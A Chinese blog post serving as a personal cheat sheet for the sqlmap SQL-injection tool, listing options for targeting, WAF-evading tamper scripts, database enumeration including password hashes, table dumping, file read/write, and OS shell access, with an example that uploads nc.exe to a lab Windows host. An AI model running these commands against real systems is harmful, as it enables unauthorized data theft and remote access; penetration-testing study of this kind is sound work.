sqlmap使用基础(一)

记录的是我比较常用的命令。

sqlmap.py -r 11.txt --random-agent --tamper=space2comment --level 5 --time-sec=2 -technique T

一、选项

-h,--help 显示基本帮助信息并退出
-hh 显示高级帮助信息并退出
--version 显示程序版本信息并退出

二、目标

在这些选项里必须提供至少一个确定目标

-u  目标URL  
例:sqlmap -u "www.abc.com/index.php?id=1"
-m  后接一个txt文件,文件中是多个url,sqlmap会自动化的检测其中的所有url。
例:sqlmap -m target.txt
-r  可以将一个post请求方式的数据包(bp抓包)保存在一个txt中,sqlmap会通过post方式检测目标。
例:sqlmap -r bp.txt

三、请求

这些选项可以用来指定如何连接到目标URL

--method=METHOD 指定是get方法还是post方法。
例: --method=GET --method=POST
--random-agent  使用随机user-agent进行测试。sqlmap有一个文件中储存了各种各样的user-agent,文件在sqlmap/txt/user-agent.txt 在level>=3时会检测user-agent注入。
--proxy=PROXY 指定一个代理。
例: --proxy="127.0.0.1:8080" 使用GoAgent代理。
--user-agent ""     【自定义user-agent
--referer  ""  【使用referer欺骗

四、注入

这些选项可用于指定要测试的参数、提供自定义注入有效载荷和可选的篡改脚本。

-p  测试参数
例:  sqlmap -r bp.txt -p "username"
--skip-static  跳过测试静态参数(有的时候注入有多个参数,那么有些无关紧要的参数修改后页面是没有变化的)
--no-cast  获取数据时,sqlmap会将所有数据转换成字符串,并用空格代替null。(这个在我们注入失败的时候偶尔会见到,提示尝试使用--no-cast)
--tamper=TAMPER 使用sqlmap自带的tamper,或者自己写的tamper,来混淆payload,通常用来绕过waf和ips。
--technique B 指定注入类型
      B : 基于Boolean的盲注(Boolean based blind)
      Q : 内联查询(Inline queries)
      T : 基于时间的盲注(time based blind)
      U : 基于联合查询(Union query based)
      E : 基于错误(error based)
      S : 栈查询(stack queries)

五、检测

这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容

--level=LEVEL  执行测试的等级(1-5,默认为1) 
lv2:cookie; lv3:user-agent,refere; lv5:host 
在sqlmap/xml/payloads文件内可以看见各个level发送的payload  我常使用--level 3
--risk=RISK  执行测试的风险(0-3,默认为1) 
risk 2:基于事件的测试;risk 3:or语句的测试;risk 4:update的测试
升高风险等级会增加数据被篡改的风险。  常用就是默认1
--privileges  【查看权限

六、枚举

这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。 脱库时使用

-b, --banner        获取数据库管理系统的标识
--current-user      获取数据库管理系统当前用户
--current-db        获取数据库管理系统当前数据库
--hostname          获取数据库服务器的主机名称
--is-dba            检测DBMS当前用户是否DBA
--users             枚举数据库管理系统用户
--passwords         枚举数据库管理系统用户密码哈希
--privileges        枚举数据库管理系统用户的权限
--dbs			   枚举数据库管理系统数据库
--tables		   枚举DBMS数据库中的表
--columns		   枚举DBMS数据库表列
-D                  要进行枚举的指定数据库名
-T                  要进行枚举的指定表名
-C                  要进行枚举的指定列名
--dump			   转储数据库表项,查询字段值
--sea文rch  		   搜索列(S),表(S)和/或数据库名称(S)
--sql-query=QUERY   要执行的SQL语句
--sql-shell         提示交互式SQL的shell

七、文件操作

这些选项可以被用来访问后端数据库管理系统的底层文件系统

--file-read=RFILE     从后端的数据库管理系统文件系统读取文件
--file-write=WFILE    编辑后端的数据库管理系统文件系统上的本地文件
--file-dest=DFILE     后端的数据库管理系统写入文件的绝对路径

在kali中将/software/nc.exe文件上传到C:/WINDOWS/Temp下:

python sqlmap.py -u"http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write="/software/nc.exe" --file-dest="C:/WINDOWS/Temp/nc.exe"

八、操作系统访问

这些选项可以用于访问后端数据库管理系统的底层操作系统

--os-cmd=OSCMD   	执行操作系统命令(OSCMD)
--os-shell          交互式的操作系统的shell
os-shell的原理

文章参考

https://www.cnblogs.com/lcamry/p/5505110.html

os-shell使用条件
网站必须是root权限(current_user()='root')
网站的绝对路径
GPC为off(默认为off)

文章转载参考:https://www.cnblogs.com/sharpff/p/11418858.html
感谢大佬分享

posted @ 2021-01-08 14:07  .醒醒  阅读(265)  评论(0编辑  收藏  举报